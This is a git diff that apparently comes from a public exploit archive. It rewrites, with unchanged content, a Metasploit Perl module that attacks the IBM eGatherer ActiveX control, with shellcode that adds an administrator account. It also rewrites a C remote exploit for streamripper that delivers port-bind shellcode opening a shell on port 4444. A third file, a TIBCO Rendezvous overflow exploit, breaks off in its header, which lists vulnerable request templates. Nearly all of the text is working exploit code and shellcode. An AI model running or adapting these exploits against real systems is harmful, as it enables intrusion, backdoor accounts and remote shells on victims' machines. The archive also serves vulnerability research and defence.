@@ -1,303 +1,303 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::ibm_egatherer; - -use strict; -use base "Msf::Exploit"; -use Pex::Text; -use Msf::Encoder; -use IO::Socket::INET; -use IPC::Open3; - -my $advanced = - { - }; - -my $info = - { - 'Name' => 'IBM eGatherer ActiveX Code Execution Vulnerability', - 'Version' => '$Revision: 1 $', - 'Authors' => - [ - 'Francisco Amato [ISR] www.infobyte.com.ar', - ], - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a code execution vulnerability in the IBM eGatherer ActiveX buffer overflow. -}), - 'Arch' => [ 'x86' ], - 'OS' => ['win32', 'win2000' ], - - 'Priv' => 0, - - 'UserOpts' => - { - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - - }, - - 'AutoOpts' => - { - 'GETPCTYPE' => 'ebx' - }, - 'Payload' => - { - 'Space' => 700, - 'BadChars' => "\x00\x88\x8e\x89\x83\x96\x98\x91\x80\x9f\x93\x97\x8c\x99\x9c\x9b\x92", # data is downcased - 'Keys' => ['+alphanum'], - - }, - 'Refs' => - [ - ['OSVDB', '27976'], - ['CVE', 'CVE-2006-4221'], - ['BID', '19554'], - ['URL', 'http://research.eeye.com/html/advisories/published/AD20060816.html'], - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - [ 'Windows 2000 SP4 English version', 0x75041111, 0x7CE8E1B6 ] -# [ 'Windows 2000 SP4 English version', 0x41414141, 0x7CE8E1B6 ] test -# 75032DB6 -#//7CE8E1B6 CALL ole32.dll -#//75041111 .data WS2_32.DLL - ], - - 'Keys' => [ 'ibm' ], - - 'DisclosureDate' => 'Aug 16 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); 
- return($self); -} - - -sub Exploit -{ - my $self = shift; - my $server = IO::Socket::INET->new( - LocalHost => $self->GetVar('HTTPHOST'), - LocalPort => $self->GetVar('HTTPPORT'), - ReuseAddr => 1, - Listen => 1, - Proto => 'tcp' - ); - my $client; - - # Did the listener create fail? - if (not defined($server)) { - $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); - return; - } - - my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? - Pex::Utils::SourceIP('1.2.3.4') : - $self->GetVar('HTTPHOST'); - - $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); - - while (defined($client = $server->accept())) { - $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); - } - - return; -} - -sub HandleHttpClient -{ - my $self = shift; - my $fd = shift; - - # Set the remote host information - my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); - - - # Read the HTTP command - my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); - my $agent; - - # Read in the HTTP headers - while ((my $line = $fd->RecvLine(10))) { - - $line =~ s/^\s+|\s+$//g; - - my ($var, $val) = split(/\:/, $line, 2); - - # Break out if we reach the end of the headers - last if (not defined($var) or not defined($val)); - - $agent = $val if $var =~ /User-Agent/i; - } - - my $os = 'Unknown'; - my $vl = ($agent =~ m/Windows/) ? 
'Vulnerable' : 'Not Vulnerable'; - - $os = 'Linux' if $agent =~ /Linux/i; - $os = 'Mac OS X' if $agent =~ /OS X/i; - $os = 'Windows' if $agent =~ /Windows/i; - - - $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); - - if ($os ne 'Windows') { - $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); - } else { - $self->PrintLine("[*] Sending payload and waiting for execution..."); - } - - my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); - - $fd->Close(); -} - -sub JSUnescape2 { - #TODO: add to Pex:Utils:JSUnescape like type of mode - my $data = shift; - my $mode = shift() || 'LE'; - my $code = ''; - - # Encode the shellcode via %u sequences for JS's unescape() function - my $idx = 0; - - # Pad to an even number of bytes - if (length($data) % 2 != 0) { - $data .= substr($data, -1, 1); - } - - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - if ($mode eq 'LE') { - $code .= sprintf('%%%.2x%%%.2x', $c2, $c1); - } else { - $code .= sprintf('%%%.2x%%%.2x', $c1, $c2); - } - $idx += 2; - } - - return $code; -} - - -sub GenerateHTML { - my $self = shift; - my $target = $self->Targets->[$self->GetVar('TARGET')]; - my $shellcode = JSUnescape2($self->GetVar('EncodedPayload')->Payload, 'RE'); - my $offsetdata = JSUnescape2(pack('V', $target->[1]),'R'); - my $offsetesp = JSUnescape2(pack('V', $target->[2]),'R'); - -#adduser, user: hax0r pass: vete -my $shellcode = '%31%c9%66%b9%30%72%51%68%20%68%61%78%68%2f%41%44%44%68%72%65%73%20%68%72%61%64%6f%68%6e%69%73%74%68%41%64%6d%69%68%6f%75%70%20%68%61%6c%67%72%68%20%6c%6f%63%68%20%6e%65%74%68%44%20%26%26%68%20%2f%41%44%68%76%65%74%65%68%78%30%72%20%68%72%20%68%61%68%20%75%73%65%68%20%6e%65%74%68%65%20%2f%63%68%64%2e%65%78%68%41%41%63%6d%31%c0%50%31%c0%8d%4c%24%06%51%bb%fa%74%59%7c%ff%d3%31%c0%50%bb%be%69%47%79%ff%d3'; -#$self->PrintLine($shellcode2); -#my $shellcode = $shellcode2; - - - my $data = qq# - - - 
IBM&ISS congratulation - - - - - - - -#; - return $data; -} - -sub BuildResponse { - my ($self, $content) = @_; - - my $response = - "HTTP/1.1 200 OK\r\n" . - "Content-Type: text/html\r\n"; - - if ($self->GetVar('Gzip')) { - $response .= "Content-Encoding: gzip\r\n"; - $content = $self->Gzip($content); - } - if ($self->GetVar('Chunked')) { - $response .= "Transfer-Encoding: chunked\r\n"; - $content = $self->Chunk($content); - } else { - $response .= 'Content-Length: ' . length($content) . "\r\n" . - "Connection: close\r\n"; - } - - $response .= "\r\n" . $content; - - return $response; -} - -sub Chunk { - my ($self, $content) = @_; - - my $chunked; - while (length($content)) { - my $chunk = substr($content, 0, int(rand(10) + 1), ''); - $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; - } - $chunked .= "0\r\n\r\n"; - - return $chunked; -} - -sub Gzip { - my $self = shift; - my $data = shift; - my $comp = int(rand(5))+5; - - my($wtr, $rdr, $err); - - my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); - print $wtr $data; - close ($wtr); - local $/; - - return (<$rdr>); -} - -1; - -# milw0rm.com [2006-08-29] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. 
+## + +package Msf::Exploit::ibm_egatherer; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use Msf::Encoder; +use IO::Socket::INET; +use IPC::Open3; + +my $advanced = + { + }; + +my $info = + { + 'Name' => 'IBM eGatherer ActiveX Code Execution Vulnerability', + 'Version' => '$Revision: 1 $', + 'Authors' => + [ + 'Francisco Amato [ISR] www.infobyte.com.ar', + ], + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a code execution vulnerability in the IBM eGatherer ActiveX buffer overflow. +}), + 'Arch' => [ 'x86' ], + 'OS' => ['win32', 'win2000' ], + + 'Priv' => 0, + + 'UserOpts' => + { + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + + }, + + 'AutoOpts' => + { + 'GETPCTYPE' => 'ebx' + }, + 'Payload' => + { + 'Space' => 700, + 'BadChars' => "\x00\x88\x8e\x89\x83\x96\x98\x91\x80\x9f\x93\x97\x8c\x99\x9c\x9b\x92", # data is downcased + 'Keys' => ['+alphanum'], + + }, + 'Refs' => + [ + ['OSVDB', '27976'], + ['CVE', 'CVE-2006-4221'], + ['BID', '19554'], + ['URL', 'http://research.eeye.com/html/advisories/published/AD20060816.html'], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ 'Windows 2000 SP4 English version', 0x75041111, 0x7CE8E1B6 ] +# [ 'Windows 2000 SP4 English version', 0x41414141, 0x7CE8E1B6 ] test +# 75032DB6 +#//7CE8E1B6 CALL ole32.dll +#//75041111 .data WS2_32.DLL + ], + + 'Keys' => [ 'ibm' ], + + 'DisclosureDate' => 'Aug 16 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + + +sub Exploit +{ + my $self = shift; + my $server = IO::Socket::INET->new( + LocalHost => $self->GetVar('HTTPHOST'), + LocalPort => $self->GetVar('HTTPPORT'), + ReuseAddr => 1, + Listen => 1, + Proto => 'tcp' + ); + my $client; + + # Did the listener create fail? + if (not defined($server)) { + $self->PrintLine("[-] Failed to create local HTTP listener on " . 
$self->GetVar('HTTPPORT')); + return; + } + + my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? + Pex::Utils::SourceIP('1.2.3.4') : + $self->GetVar('HTTPHOST'); + + $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); + + while (defined($client = $server->accept())) { + $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); + } + + return; +} + +sub HandleHttpClient +{ + my $self = shift; + my $fd = shift; + + # Set the remote host information + my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); + + + # Read the HTTP command + my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); + my $agent; + + # Read in the HTTP headers + while ((my $line = $fd->RecvLine(10))) { + + $line =~ s/^\s+|\s+$//g; + + my ($var, $val) = split(/\:/, $line, 2); + + # Break out if we reach the end of the headers + last if (not defined($var) or not defined($val)); + + $agent = $val if $var =~ /User-Agent/i; + } + + my $os = 'Unknown'; + my $vl = ($agent =~ m/Windows/) ? 
'Vulnerable' : 'Not Vulnerable'; + + $os = 'Linux' if $agent =~ /Linux/i; + $os = 'Mac OS X' if $agent =~ /OS X/i; + $os = 'Windows' if $agent =~ /Windows/i; + + + $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); + + if ($os ne 'Windows') { + $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); + } else { + $self->PrintLine("[*] Sending payload and waiting for execution..."); + } + + my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); + + $fd->Close(); +} + +sub JSUnescape2 { + #TODO: add to Pex:Utils:JSUnescape like type of mode + my $data = shift; + my $mode = shift() || 'LE'; + my $code = ''; + + # Encode the shellcode via %u sequences for JS's unescape() function + my $idx = 0; + + # Pad to an even number of bytes + if (length($data) % 2 != 0) { + $data .= substr($data, -1, 1); + } + + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + if ($mode eq 'LE') { + $code .= sprintf('%%%.2x%%%.2x', $c2, $c1); + } else { + $code .= sprintf('%%%.2x%%%.2x', $c1, $c2); + } + $idx += 2; + } + + return $code; +} + + +sub GenerateHTML { + my $self = shift; + my $target = $self->Targets->[$self->GetVar('TARGET')]; + my $shellcode = JSUnescape2($self->GetVar('EncodedPayload')->Payload, 'RE'); + my $offsetdata = JSUnescape2(pack('V', $target->[1]),'R'); + my $offsetesp = JSUnescape2(pack('V', $target->[2]),'R'); + +#adduser, user: hax0r pass: vete +my $shellcode = '%31%c9%66%b9%30%72%51%68%20%68%61%78%68%2f%41%44%44%68%72%65%73%20%68%72%61%64%6f%68%6e%69%73%74%68%41%64%6d%69%68%6f%75%70%20%68%61%6c%67%72%68%20%6c%6f%63%68%20%6e%65%74%68%44%20%26%26%68%20%2f%41%44%68%76%65%74%65%68%78%30%72%20%68%72%20%68%61%68%20%75%73%65%68%20%6e%65%74%68%65%20%2f%63%68%64%2e%65%78%68%41%41%63%6d%31%c0%50%31%c0%8d%4c%24%06%51%bb%fa%74%59%7c%ff%d3%31%c0%50%bb%be%69%47%79%ff%d3'; +#$self->PrintLine($shellcode2); +#my $shellcode = $shellcode2; + + + my $data = qq# + + + 
IBM&ISS congratulation + + + + + + + +#; + return $data; +} + +sub BuildResponse { + my ($self, $content) = @_; + + my $response = + "HTTP/1.1 200 OK\r\n" . + "Content-Type: text/html\r\n"; + + if ($self->GetVar('Gzip')) { + $response .= "Content-Encoding: gzip\r\n"; + $content = $self->Gzip($content); + } + if ($self->GetVar('Chunked')) { + $response .= "Transfer-Encoding: chunked\r\n"; + $content = $self->Chunk($content); + } else { + $response .= 'Content-Length: ' . length($content) . "\r\n" . + "Connection: close\r\n"; + } + + $response .= "\r\n" . $content; + + return $response; +} + +sub Chunk { + my ($self, $content) = @_; + + my $chunked; + while (length($content)) { + my $chunk = substr($content, 0, int(rand(10) + 1), ''); + $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; + } + $chunked .= "0\r\n\r\n"; + + return $chunked; +} + +sub Gzip { + my $self = shift; + my $data = shift; + my $comp = int(rand(5))+5; + + my($wtr, $rdr, $err); + + my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); + print $wtr $data; + close ($wtr); + local $/; + + return (<$rdr>); +} + +1; + +# milw0rm.com [2006-08-29] diff --git a/platforms/windows/remote/2277.c b/platforms/windows/remote/2277.c index e5c67af26..d7ebe52c6 100755 --- a/platforms/windows/remote/2277.c +++ b/platforms/windows/remote/2277.c 
@@ -1,189 +1,189 @@
-/*
- * name: streamripper <= 1.61.25 win32 remote exploit
- *
- * bug by: Ulf Harnhammar
- * status: public
- * exploit: psylocn
- * payload: portbind 4444
- * **********************************************************
- * K:\>exploit.exe 80 0
- * [ public-release ]
- * streamripper <= 1.61.25 remote exploit
- * exploit by psylocn 2006
- * bug by Ulf Harnhammar
- *
- * [+] server started!
- * [+] server waits
- *
- *
- * go to next shell
- * K:\>streamripper.exe http://127.0.0.1:80
- * Connecting...
- *
- * on other shell
- * [+] client conneted!
- * [+] exploit send check shell on port 4444
- *
- * now connect to 127.0.0.1:4444
-*/
-
-/* #define _WIN32 */
-
-#include
-#include
-#include
-
-#ifdef _WIN32
-#include
-#pragma comment(lib, "ws2_32")
-#else
-#include
-#include
-#include
-#endif
-
-/* portbind shellcode port 4444*/
-unsigned char portbindsc[] =
-"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
-"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
-"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
-"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
-"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
-"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
-"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
-"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
-"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
-"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
-"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
-"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
-"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
-"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
-"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
-"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
-"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
-"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
-"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
-"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
-"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
-"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";
-
-char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
- "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7
    \r\n"
- "icy-name:Radioseven - www.radio.de\r\n"
- "icy-genre:Dance Trance House\r\n"
- "icy-url:http://www.radio.de\r\n"
- "content-type:"; //buffer to exploit
-
-char part2[] = "\r\n"
- "icy-pub:1\r\n"
- "icy-metaint:8192\r\n"
- "icy-br:CCCCCCC\r\n\r\n";
-
-char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp
-
-struct targets {
- int num;
- char name[50];
- long jmpaddr;
-}
-target[]= {
- { 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp
- { 1, "debug [testing] ", 0x41414141 },
-};
-
-void Usage(){
-
- int i;
- printf("Usage: exploit.exe port target\n\n"
- "Targets:\n\n");
- for (i = 0; i < 2; i++)
- {
- if(target[i].name != 0)
- fprintf(stderr," [%u] %s\n",i,target[i].name);
- else
- break;
- }
- exit(1);
-}
-
-int main (int argc, char **argv) {
-
- char *host;
- struct sockaddr_in my_addr;
- struct sockaddr_in their_addr;
- int sockfd,port,new_sock,sin_size=sizeof (their_addr);
-
-
- char buffer[3565];
-
-#ifdef _WIN32
- WSADATA wsa;
-#endif
-
-
-#ifdef _WIN32
- WSAStartup(MAKEWORD(2,0), &wsa);
-#endif
-
- printf("[ public-release ]\n");
- printf("\tstreamripper <= 1.61.25 remote exploit \n");
- printf("\texploit by psylocn 2006\n");
- printf("\tbug by Ulf Harnhammar\n\n");
-
- unsigned long ntarget = 0;
- if (argc < 3) Usage();
- if ((ntarget = atoi(argv[2])) > 1) Usage();
-
- port = (unsigned short)atoi(argv[1]);
-
- if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
- printf("[-] socket error\n");
- return 0;
- }
-
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons(port);
- my_addr.sin_addr.s_addr = INADDR_ANY;
-
- if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {
- printf("\n[-] bind error\n");
- return 0;
- }
- else printf ("[+] server started!\n");
-
- if (listen (sockfd, 3) == SOCKET_ERROR) {
- printf("\n[-] listen error\n");
- return 0;
- }
- printf ("[+] server waits\n");
-
- if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {
- 
printf("\n[-] accept error\n");
- return 0;
- }
- else
- printf ("[+] client conneted!\n");
-
- memset ( buffer, 0x90, sizeof(buffer) - 1 );
- memcpy ( buffer, part1, strlen(part1) );
- memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
- memcpy ( buffer+3150, fixstack,strlen(fixstack) );
- memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
-
- memcpy ( buffer+3515, part2, sizeof(part2) );
-
- if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {
- printf("[-] send error\n");
- return 0;
- }
- sleep(2000);
- printf("[+] exploit send check shell on port 4444\n");
-
- closesocket(sockfd);
-#ifdef _WIN32
- WSACleanup ();
-#endif
-return 0;
-}
-
-// milw0rm.com [2006-08-29]
+/*
+ * name: streamripper <= 1.61.25 win32 remote exploit
+ *
+ * bug by: Ulf Harnhammar
+ * status: public
+ * exploit: psylocn
+ * payload: portbind 4444
+ * **********************************************************
+ * K:\>exploit.exe 80 0
+ * [ public-release ]
+ * streamripper <= 1.61.25 remote exploit
+ * exploit by psylocn 2006
+ * bug by Ulf Harnhammar
+ *
+ * [+] server started!
+ * [+] server waits
+ *
+ *
+ * go to next shell
+ * K:\>streamripper.exe http://127.0.0.1:80
+ * Connecting...
+ *
+ * on other shell
+ * [+] client conneted! 
+ * [+] exploit send check shell on port 4444
+ *
+ * now connect to 127.0.0.1:4444
+*/
+
+/* #define _WIN32 */
+
+#include
+#include
+#include
+
+#ifdef _WIN32
+#include
+#pragma comment(lib, "ws2_32")
+#else
+#include
+#include
+#include
+#endif
+
+/* portbind shellcode port 4444*/
+unsigned char portbindsc[] =
+"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
+"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
+"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
+"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
+"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
+"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
+"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
+"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
+"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
+"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
+"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
+"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
+"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
+"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
+"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
+"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
+"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
+"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
+"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
+"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
+"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
+"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";
+
+char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
+ "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7
    \r\n"
+ "icy-name:Radioseven - www.radio.de\r\n"
+ "icy-genre:Dance Trance House\r\n"
+ "icy-url:http://www.radio.de\r\n"
+ "content-type:"; //buffer to exploit
+
+char part2[] = "\r\n"
+ "icy-pub:1\r\n"
+ "icy-metaint:8192\r\n"
+ "icy-br:CCCCCCC\r\n\r\n";
+
+char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp
+
+struct targets {
+ int num;
+ char name[50];
+ long jmpaddr;
+}
+target[]= {
+ { 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp
+ { 1, "debug [testing] ", 0x41414141 },
+};
+
+void Usage(){
+
+ int i;
+ printf("Usage: exploit.exe port target\n\n"
+ "Targets:\n\n");
+ for (i = 0; i < 2; i++)
+ {
+ if(target[i].name != 0)
+ fprintf(stderr," [%u] %s\n",i,target[i].name);
+ else
+ break;
+ }
+ exit(1);
+}
+
+int main (int argc, char **argv) {
+
+ char *host;
+ struct sockaddr_in my_addr;
+ struct sockaddr_in their_addr;
+ int sockfd,port,new_sock,sin_size=sizeof (their_addr);
+
+
+ char buffer[3565];
+
+#ifdef _WIN32
+ WSADATA wsa;
+#endif
+
+
+#ifdef _WIN32
+ WSAStartup(MAKEWORD(2,0), &wsa);
+#endif
+
+ printf("[ public-release ]\n");
+ printf("\tstreamripper <= 1.61.25 remote exploit \n");
+ printf("\texploit by psylocn 2006\n");
+ printf("\tbug by Ulf Harnhammar\n\n");
+
+ unsigned long ntarget = 0;
+ if (argc < 3) Usage();
+ if ((ntarget = atoi(argv[2])) > 1) Usage();
+
+ port = (unsigned short)atoi(argv[1]);
+
+ if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
+ printf("[-] socket error\n");
+ return 0;
+ }
+
+ my_addr.sin_family = AF_INET;
+ my_addr.sin_port = htons(port);
+ my_addr.sin_addr.s_addr = INADDR_ANY;
+
+ if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {
+ printf("\n[-] bind error\n");
+ return 0;
+ }
+ else printf ("[+] server started!\n");
+
+ if (listen (sockfd, 3) == SOCKET_ERROR) {
+ printf("\n[-] listen error\n");
+ return 0;
+ }
+ printf ("[+] server waits\n");
+
+ if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {
+ 
printf("\n[-] accept error\n");
+ return 0;
+ }
+ else
+ printf ("[+] client conneted!\n");
+
+ memset ( buffer, 0x90, sizeof(buffer) - 1 );
+ memcpy ( buffer, part1, strlen(part1) );
+ memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
+ memcpy ( buffer+3150, fixstack,strlen(fixstack) );
+ memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
+
+ memcpy ( buffer+3515, part2, sizeof(part2) );
+
+ if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {
+ printf("[-] send error\n");
+ return 0;
+ }
+ sleep(2000);
+ printf("[+] exploit send check shell on port 4444\n");
+
+ closesocket(sockfd);
+#ifdef _WIN32
+ WSACleanup ();
+#endif
+return 0;
+}
+
+// milw0rm.com [2006-08-29]
diff --git a/platforms/windows/remote/2283.c b/platforms/windows/remote/2283.c
index 4b1ee6bb2..38153e407 100755
--- a/platforms/windows/remote/2283.c
+++ b/platforms/windows/remote/2283.c 
@@ -1,422 +1,422 @@ -/* -Exploit: TIBCO RendezVous remote buffer overflow exploit for Win32 (public version) -Affected products: Tibco RendezOVous version <=7.4.11 (Multiple Vulnerabilities) -Author: Andres Tarasco Acuña (atarasco @ sia.es ) -Advisory: http://www.514.es -Url: http://www.sia.es -Greetings: Iñaki Lopez and SIA TigerTeam -Status: vulnerability fixed ( Vendor notification + fixes) - -Timeline: ----------------- -Discovered: March 23, 2006 -Exploit coded: March 24, 2006 -Vendor Notified: March 27, 2006 -Vendor patch: May 15, 2006 - Tibco Rendezvous version 7.5 -Public Disclosure: who knows - - -Affected daemons: ------------------------ -- TIB/Rendezvous Routing Communications Daemon (add router buffer overflow) (port 7580) -+ POST /add_router HTTP/1.0 -+ router_name=AAAA..AAA&type=+Add+Router+ - -- TIB/Rendezvous Secure Daemon (port 7580) -+ POST /sd_add_network_service HTTP/1.0 -+ network=AAAA..AAAA&service=&type=Add - -- TIB/Rendezvous Secure Daemon (port 7580) -+ certificate_from_file() lets remote user verify if remote file exists - -- TIB/Rendezvous Secure Daemon (port 7580) -+ Authorized Subjects XSS vulnerability - -- TIB/Rendezvous Secure Routing Daemon (add router buffer overflow) (port 7580) -+ POST /add_router HTTP/1.0 -+ router_name=AAAA..AAA&type=+Add+Router+ - -- TIB/Rendezvous Agent for Java (TIB/Rendezvous Daemon Connection Buffer overflow) (port 7581) - + POST /set_main HTTP/1.0 - + edit_listen=7600&edit_service=AAAA..AAAA&edit_network=&edit_daemon=&submit=Submit - -- TIB/Rendezvous Initial Value Cache (port 7581) - + POST /change_services HTTP/1.0 - + Service=&Network=&Daemon=AAA&request_type=Submit - -Affected Operating systems: -------------------------------- -- AIX 5.1 and up RS/6000 -- FreeBSD 4.2 and up x86 -- HP/UX 11.X HPPA -- HP/UX 11.22 and up IA-64/Itanium -- Linux 2.4 kernel: 2.4.20 and up, glibc2.2.4 and up x86 -- Linux 2.4 kernel: 2.4.20 and up, glibc2.3 and up (includes 2.6 kernel) x86 -- Linux 2.4 kernel: 2.4.18 